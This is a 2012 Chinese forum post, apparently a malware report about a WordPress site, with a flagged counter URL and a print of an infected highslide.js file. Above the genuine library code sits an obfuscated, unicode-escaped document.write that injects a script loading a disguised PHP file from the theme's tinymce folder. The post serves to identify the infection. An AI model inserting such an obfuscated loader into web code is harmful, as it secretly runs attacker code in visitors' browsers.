本帖最后由 said411f 于 2012-8-6 13:51 编辑
1.hXXp://stats.hosting24.com/count.php
2.Malware found on javascript file:
hXXp://www.xiaodebu.com/wp-content/themes/Deve1.0/highslide/highslide.js
Known javascript malware.
document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u002F\u0077\u0070\u002D\u0069\u006E\u0063\u006C\u0075\u0064\u0065\u0073\u002F\u006A\u0073\u002F\u0074\u0069\u006E\u0079\u006D\u0063\u0065\u002F\u0074\u0068\u0065\u006D\u0065\u0073\u002F\u006D\u0065\u006E\u0075\u0073\u0070\u0065\u0063\u0073\u002E\u0070\u0068\u0070\u0022\u003E\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");if(!hs){var hs={lang:{cssDirection:'ltr',loadingText:'Loading...',loadingTitle:'Click to cancel',focusTitle:'Click to bring to front',fullExpandTitle:'Expand to actual size (f)',creditsText:'Powered by <i>Highslide JS</i>',creditsTitle:'Go to the Highslide JS homepage',restoreTitle:'Click to close image, click and drag to move. Use arrow keys for next and previous.'},graphicsDir:'highslide/graphics/',expandCursor:'zoomin.cur',restoreCursor:'zoomout.cur',expandDuration:250,restoreDuration:250,marginLeft:15,marginRight:15,marginTop:15,marginBottom:15,zIndexCounter:1001,loadingOpacity:0.75,allowMultipleInstances:true,numberOfImagesToPreload:5,outlineWhileAnimating:2,outlineStartOffset:3,padToMinWidth:false,fullExpandPosition:'bottom right',fullExpandOpacity:1,showCredits:true,creditsHref:'http://highslide.com/',creditsTarget:'_self',enableKeyListener:true,openerTagNames:['a'],dragByHeading:true,minWidth:200,minHeight:200,allowSizeReduction:true,outlineType:'drop-shadow',preloadTheseImages:[],continuePreloading:true,expanders:[],overrides:['allowSizeReduction','useBox','outlineType','outlineWhileAnimating','captionId','captionText','captionEval','captionOverlay','headingId','headingText','headingEval','headingOverlay','creditsPosition','dragByHeading','width','height','wrapperClassName','minWidth','minHeight','maxWidth','maxHeight','pageOrigin','slideshowGroup','easing','easingClose','fadeInOut','src'],overlays:[],idCounter:0,oPos:{x:['leftpanel','left','center','right','rightpanel'],y:['above','top','middle','bottom','below']},mouse:{},headingOverlay:{},captionOverlay:{},timers:[],pendingOutlines:{},clones:{},onReady:[],uaVersion:/Trident\/4\.0/.test(navigator.userAgent)?8:parseFloat((navigator.userAgent.toLowerCase().match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[0,'0'])[1]),ie:(document.all&&!window.opera),safari:/Safari/.test(navigator.userAgent),geckoMac:/Macintosh.+rv:1\.[0-8].+Gecko/.test(navigator.userAgent),$:function(id){if(id)return document.getElementById(id);},push:function(arr,val){arr[arr.length]=val;},createElement:function(tag,attribs,styles,parent,nopad){var el=document.createElement(tag);if(attribs)hs.extend(el,attribs);if(nopad)hs.setStyles(el,{padding:0,border:'none',margin:0});if(styles)hs.setStyles(el,styles);if(parent)parent.appendChild(el);return el;},extend:function(el,attribs){for(var x in attribs)el[x]=attribs[x];return el;},setStyles:function(el,styles){for(var x in styles){if(hs.ie&&x=='opacity'){if(styles[x]>0.99)el.style.removeAttribute('filter');else el.style.filter='alpha(opacity='+(styles[x]*100)+')';}
|
发表于 2012-8-4 11:30:45
